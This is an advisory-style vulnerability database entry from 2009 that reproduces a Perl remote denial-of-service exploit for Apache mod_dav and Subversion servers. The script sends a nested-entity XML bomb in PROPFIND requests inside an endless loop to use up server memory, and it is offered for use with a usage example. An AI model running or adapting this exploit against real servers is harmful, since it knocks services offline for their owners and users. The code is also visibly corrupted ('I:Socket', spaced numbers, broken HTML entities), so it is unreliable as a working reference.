Apache mod_dav / svn remote denial of service vulnerability-vulnerability warning-the black bar safety net

2009-06-11T00:00:00
ID MYHACK58:62200923532
Type myhack58
Reporter 佚名
Modified 2009-06-11T00:00:00

Description

Exploitation of this vulnerability will run out of all system memory resources.

furoffyourcat.pl

Apache mod_dav / svn Remote Denial of Service Exploit

by kcope / June 2 0 0 9

Will exhaust all system memory

Needs Authentication on normal DAV

This can be especially serious stuff when used against

svn (subversion) servers!! Svn might let the PROPFIND slip through

without authentication. bwhahaaha :o)

use at your own risk!

############################################################

use I:Socket; use MIME::Base64;

sub usage { print "Apache mod_dav / svn Remote Denial of Service Exploit\n"; print "by kcope in 2 0 0 9\n"; print "usage: perl furoffyourcat.pl <remotehost> <webdav folder> [username] [password]\n"; print "example: perl furoffyourcat.pl svn.XXX.com /projects/\n";exit; }

if ($#ARGV < 1) {usage();}

$hostname = $ARGV[0]; $webdavfile = $ARGV[1];

$username = $ARGV[2]; $password = $ARGV[3];

$|=1;

$BasicAuth = encode_base64("$username:$password"); chomp $BasicAuth;

my $sock = I:Socket::INET->new(PeerAddr => $hostname, PeerPort => 8 0, Proto => 'tcp'); print $sock "PROPFIND $webdavfile HTTP/1.1\r\n"; print $sock "Host: $hostname\r\n"; print $sock "Depth: 0\r\n"; print $sock "Connection: close\r\n"; if ($username ne "") { print $sock "Authorization: Basic $BasicAuth\r\n"; } print $sock "\r\n"; $x = <$sock>;

print $x; if (! ($x =~ /2 0 7/)) { while(<$sock>) { print; } close($sock); print "No PROPFIND on this server and path.\ n"; exit(0); }

$a = ""; for ($i=1;$i<2 5 6;$i++) { # Here you can increase the XML bomb count $k = $i-1; $a .= "<! ENTITY x$i \"&x - $k;&x - $k;\">\n" }

$igzml = "<? xml version=\"1.0\"?& gt;\n" ."& lt;! DOCTYPE REMOTE [\n" ."& lt;! ELEMENT REMOTE ANY>\n" ."& lt;! ENTITY x0 \"foobar\">\n" .$ a ."]& gt;\n" ."& lt;REMOTE>\n" ."& amp;x - $k;\n" ."& lt;/REMOTE>\n";

print "Apache mod_dav / svn Remote Denial of Service Exploit\n"; print "by kcope in 2 0 0 9\n"; print "Launching a DoS Attack...\n";

$ExploitRequest = "PROPFIND $webdavfile HTTP/1.1\r\n" ." Host: $hostname\r\n" ." Depth: 0\r\n";

if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; } $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ". length($igzml)."\ r\n\r\n" . $igzml;

while(1) { again: my $sock = I:Socket::INET->new(PeerAddr => $hostname, PeerPort => 8 0, Proto => 'tcp') || (goto again);

print $sock $ExploitRequest; print ";Pp"; }

milw0rm.com [2009-06-01]